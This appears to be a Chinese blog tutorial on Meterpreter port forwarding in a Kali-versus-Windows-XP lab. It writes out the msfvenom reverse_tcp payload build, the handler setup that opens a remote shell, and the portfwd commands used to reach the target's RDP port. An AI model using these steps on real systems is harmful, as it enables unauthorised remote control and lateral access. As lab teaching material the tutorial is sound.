Meterprete端口转发
Meterpreter中有一个命令,可以替代lcx,nc等来解决大部分端口转发问题
命令:portfwd
攻击机:kali 10.10.1.104
靶机:windowsxp 10.10.1.103
靶机打开3389端口方便验证
portfwd
拿到目标机的meterpreter shell 生成一个木马
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.104 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
在靶机上运行该shell 成功上线
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.1.104
lhost => 10.10.1.104
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.10.1.104:4444
[*] Sending stage (180291 bytes) to 10.10.1.103
[*] Meterpreter session 1 opened (10.10.1.104:4444 -> 10.10.1.103:1043) at 2020-06-24 09:43:54 -0400meterpreter >
使用portfwd进行转发, portfwd是meterpreter的一个网络命令,只能在meterpreter shell里面运行
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]OPTIONS:-L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.-R Indicates a reverse port forward.-h Help banner.-i <opt> Index of the port forward entry to interact with (see the "list" command).-l <opt> Forward: local port to listen on. Reverse: local port to connect to.-p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.-r <opt> Forward: remote host to connect to.
meterpreter >
下面开始转发
meterpreter > portfwd add -l 3389 -r 10.10.1.103 -p 23389
[*] Local TCP relay created: :3389 <-> 10.10.1.103:23389
meterpreter > portfwd Active Port Forwards
====================Index Local Remote Direction----- ----- ------ ---------1 0.0.0.0:3389 10.10.1.103:23389 Forward1 total active port forwards.meterpreter >
portfwd add -l 23389 -r 10.10.1.103 -p 3389
这句话的意思是把远程主机的3389端口转发到本地的23389进行监听
连接本地23389端口,成功登陆
其他
列出端口转发条目
portfwd list删除id为1的端口转发
portfwd delete -i 1清空所有转发
portfwd flush
Meterprete端口转发相关推荐
- mac 端口转发方案
mac 端口映射 好坑 osx10.10mac移除了ipfw改用pf pf以前没用过 查文档 mac的 pf语法,没有找到.bsd的倒是很全,心喜拿来一试. http://www.openbsd.or ...
- SecureCRT 端口转发连接服务器
场景: 1.日常远程管理服务器,大多是先通过连接接入到公网中的跳板机,再ssh到内网其他服务器中进行管理操作. 2.为了服务器更安全的管理,一般是使用ssh公私钥方式连接linux.而即使Secure ...
- Windows自带的端口转发工具netsh使用方法_DOS/BAT
Windows自带的端口转发工具netsh使用方法_DOS/BAT 作者:用户 来源:互联网 时间:2017-02-22 17:24:30 netsh 端口转发 摘要: 下面的代码在windows下运 ...
- 100行php代码实现加密端口转发
2019独角兽企业重金招聘Python工程师标准>>> 如题,这个是100行php代码实现代理上网最终篇,玩具性质,个人用可以,因为1性能不高,2加解密IV重复使用. 用法就是soc ...
- 内网端口 转发 穿透 工具简介
目录 一.LCX 1.lcx 内网端口转发(类似于SSH远程转发-R) 2.本地端口转发(类似于SSH本地转发-L) 二.nc反弹 正向连接 反向连接 三.socks代理工具 (1)Earthworm ...
- 端口转发与代理工具 内网代理 内网反弹代理
目录 一.LCX 二.nc 反弹 三.socks代理工具 四.frp 内网穿透利器 五.ngrok 内网穿透 理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主 ...
- linux端口转发到windows,Linux及Windows基于工具的端口转发
Linux及Windows基于工具和命令的端口转发配置 wget http://www.boutell.com/rinetd/http/rinetd.tar.gz&&tar -xvf ...
- 使用ssh做端口转发
有时候Linux服务器上的某些服务监听的是本地(localhost,127.0.0.1)的端口,外部无法直接访问该服务,可以使用以下命令做端口转发: ssh -N -f -L 0.0.0.0:9091 ...
- windows操作系统自带的TCP端口转发
假定需要通过192.168.1.8的14941端口连接192.168.1.118的1494端口,则需要在192.168.1.8主机的命令行输入如下语句 netsh interface ipv6 in ...
最新文章
- oracle怎么下载安装,Oracle数据库的下载和安装方法
- 这38个小技巧告诉你如何快速学习MySQL数据库
- 华夏基金专访神策数据创始人兼 CEO 桑文锋,金融科技数字化趋势认知传递
- IM推送保障及网络优化详解(一):如何实现不影响用户体验的后台保活
- Python Django Session中存取值常用API
- 8086逻辑运算和移位
- javascript日历插件
- ssl1007 and ssl -最大乘积 and 加法最大【区间dp练习】
- html5 webrtc fir 请求关键帧_中信建投官网强调认可我们的投资理念的股民朋友请求 CTRL D 收藏、锁定本直播地址...
- android exittext记事本,GUI练习——记事本
- TOMCAT 连接池数据库密码加密方法
- 虚拟网卡实现一个网卡多个地址
- 网页撤销后ubuntu本地撤销
- spring 扫描所有_自定义Spring事件监听机制
- 聊天机器人mysql数据_自己动手开发智能聊天机器人完全指南(附完整源码)
- 软件工程(1)软件开发方法
- 在主动要求涨工资这事上,不要学我!从第一份工资800开始说起
- Android APK瘦身之Android Studio Lint (代码审查)
- [2019 icpc徐州] H.Yuuki and a problem 带修改的主席树(主席树+树状数组)
- Mac 升级Python 有python2.7到python3.9